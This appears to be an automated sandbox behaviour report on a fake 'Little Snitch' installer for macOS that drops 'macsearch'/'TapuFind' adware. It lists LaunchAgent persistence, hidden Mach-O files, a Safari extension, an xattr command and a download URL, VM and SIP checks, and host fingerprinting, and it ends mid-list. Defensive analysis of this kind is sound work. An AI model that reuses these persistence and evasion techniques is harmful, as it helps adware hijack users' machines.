Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/reflection
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/remoting.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/runtime.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/seq-points
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-bridg
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-mono.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-new-b
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-dynar
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-old-b
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-scan-obje
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-os-ma
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-stw.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-tarja
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-toggl
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/socket-io.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sre-encode
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sre-save.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sre.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/string-ica
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threads.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/verify.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-alloc.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-array-lis
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-debug.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-descripto
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-fin-weak-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gc.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gchandles
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gray.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-internal.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-los.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-marksweep
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-copy-obje
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-memory-go
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-nursery-a
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-pointer-q
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-protocol.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-split-nur
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-workers.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/error.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/events.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/io.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/mutexes.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/processes.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/semaphores
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/sockets.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/versioninf
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/wapi.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/hazard-pointe
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/json.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/lock-free-all
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/lock-free-arr
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/lock-free-que
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mach-support-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/memfuncs.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-codeman.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-conc-has
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-counters
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-dl.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-error.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-internal
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-linked-l
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-logger.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-mmap.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-rand.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-sha1.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-lazy-ini
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-tls.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/monobitset.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/networking-po
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/strenc.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/w32handle.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/garray.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gdate-unix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gdir-unix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gerror.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gfile-posix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/ghashtable.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/giconv.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gmarkup.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gmisc-unix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gpath.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gptrarray.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gshell.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gspawn.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gstr.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gstring.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gtimer-unix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/../../../mono-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/liveness.c!(cf
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/method-to-ir.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/ir-emit.hmono_
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-trampolin
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini.cpos == f
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/trace.c!mono_m
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/unwind.cread32
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/assembly.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-os-ma
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sre.copt_p
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-debug.c!m
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gc.c!pend
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-copy-obje
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-memory-go
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/mutexes.cw
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-internal
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-linked-l
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/runtime/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mempool-in
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/glib.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-os-mutex
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/atomic.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-membar.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-logger-i
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-tls.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-os-semap
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-coop-mut
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-coop-sem
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-time.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/../../../mono-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/object-off
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-linked-l
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/metadata-i
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/handle.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gc.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-descripto
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-clien
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-cardtable
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-complex.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-array-lis
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gray.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-marksweep
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-protocol-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-minor-cop
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-minor-sca
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/wapi-priva
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-hwcap-va
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/sort.frag.h
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Uses the Python framework
Source: /usr/bin/xattr (PID: 674) | Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/xattr (PID: 678) | Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/xattr (PID: 693) | Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to disk
Source: /usr/bin/ditto (PID: 673) | XML plist file created: /private/tmp/macsearch.app/Contents/.BC.T_8EnSAw
Source: /usr/bin/ditto (PID: 673) | Binary plist file created: /private/tmp/macsearch.app/Contents/Resources/Base.lproj/.BC.T_g27T4p
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | XML plist file created: /private/tmp/tapufind/.dat.nosync02b9.IwDBz8
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.Xbmr58
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | XML plist file created: /private/tmp/tapufind/.dat.nosync02b9.sOJfNr
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) | XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.u0j70j
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) | Binary plist file created: /Users/henry/Library/Caches/com.apple.Safari/Extensions/TapuFind.safariextension/Extensions.plist
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) | XML plist file created: /Users/henry/Library/Caches/com.apple.Safari/Extensions/TapuFind.safariextension/Info.plist
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702) | XML plist file created: /Users/henry/Library/Caches/com.apple.Safari/Extensions/TapuFind.safariextension/Settings.plist

Boot Survival:

Creates memory-persistent launch services
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.u0j70j -> /Users/henry/Library/LaunchAgents/tapufind.plist
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.Xbmr58 -> /Users/henry/Library/LaunchAgents/tapufind.plist
Creates user-wide 'launchd' managed services aka launch agents
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Launch agent created, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.Xbmr58 -> /Users/henry/Library/LaunchAgents/tapufind.plist
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Launch agent created, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.u0j70j -> /Users/henry/Library/LaunchAgents/tapufind.plist

Hooking and other Techniques for Hiding and Protection:

Modifies or sets the kMDItemWhereFroms metadata storing the file's origin
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - Xattr command executed: /usr/bin/xattr xattr -w com.apple.metadata:kMDItemWhereFroms \<\!DOCTYPE\ plist\ PUBLIC\ \'-//Apple//DTD\ PLIST\ 1.0//EN\'\ \'http://www.apple.com/DTDs/PropertyList-1.0.dtd\'\>\<plist\ version=\'1.0\'\>\<array\>\<string\>http://reiteration-a.akamaihd.net/INSREZBHAZUIKGLAASDZFAHUYDWNBYTRWMFSOGZQNJYCAP/FlashPlayer.dmg?S2SURL=\</string\>\</array\>\</plist\> ~/Library/X2441139MAC/Temp/player.dmg
Creates hidden Mach-O files
Source: /usr/bin/ditto (PID: 673) - Hidden Mach-O file written: Mach-O 64 bit: /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5Ob
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Hidden Mach-O file written: Mach-O 64 bit: /private/tmp/tapufind/.dat.nosync02b9.o9GXrL
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Hidden Mach-O file written: Mach-O 64 bit: /private/tmp/tapufind/.dat.nosync02b9.raddFF
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Hidden Mach-O file written: Mach-O 64 bit: /private/tmp/tapufind/.dat.nosync02b9.DAOwrT
Uses known network protocols on non-standard ports
Source: unknown - Network traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknown - Network traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknown - Network traffic detected: HTTP traffic on port 49284 -> 10000
Source: unknown - Network traffic detected: HTTP traffic on port 10000 -> 49284
Source: unknown - Network traffic detected: HTTP traffic on port 49285 -> 10000
Source: unknown - Network traffic detected: HTTP traffic on port 10000 -> 49285
Source: unknown - Network traffic detected: HTTP traffic on port 49286 -> 10000
Source: unknown - Network traffic detected: HTTP traffic on port 10000 -> 49286

Malware Analysis System Evasion:

An application crashed which may indicate that the sample tries to avoid analysis
Source: /usr/libexec/xpcproxy (PID: 724) - ReportCrash process spawned: /System/Library/CoreServices/ReportCrash agent
Reads the sysctl hardware model value (may be used for detecting VM presence)
Source: /usr/sbin/system_profiler (PID: 659) - Sysctl read request: hw.model (6.2)
Source: /usr/sbin/system_profiler (PID: 661) - Sysctl read request: hw.model (6.2)

HIPS / PFW / Operating System Protection Evasion:

Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Csrutil executable: /usr/bin/csrutil -> /usr/bin/csrutil status
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - Sysctl read request: kern.safeboot (1.66)

Language, Device and Operating System Detection:

Reads hardware related sysctl values
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - Sysctl read request: hw.availcpu (6.25)
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - Sysctl read request: hw.ncpu (6.3)
Source: /usr/sbin/system_profiler (PID: 659) - Sysctl read request: hw.cpu_freq (6.15)
Source: /usr/sbin/system_profiler (PID: 659) - Sysctl read request: hw.memsize (6.24)
Source: /usr/sbin/system_profiler (PID: 661) - Sysctl read request: hw.cpu_freq (6.15)
Source: /usr/sbin/system_profiler (PID: 661) - Sysctl read request: hw.memsize (6.24)
Reads the system's OS release and/or type
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - Sysctl requested: kern.ostype (1.1)
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653) - Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674) - Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674) - Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678) - Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678) - Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693) - Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693) - Sysctl requested: kern.osrelease (1.2)
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Sysctl requested: kern.ostype (1.1)
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697) - Sysctl requested: kern.osrelease (1.2)
Source: /tmp/tapufind/ChromeAndFirefoxSetter (PID: 716) - Sysctl requested: kern.ostype (1.1)
Source: /tmp/tapufind/ChromeAndFirefoxSetter (PID: 716) - Sysctl requested: kern.osrelease (1.2)
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713) - Sysctl requested: kern.ostype (1.1)
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713) - Sysctl requested: kern.osrelease (1.2)
Reads the system's hostname
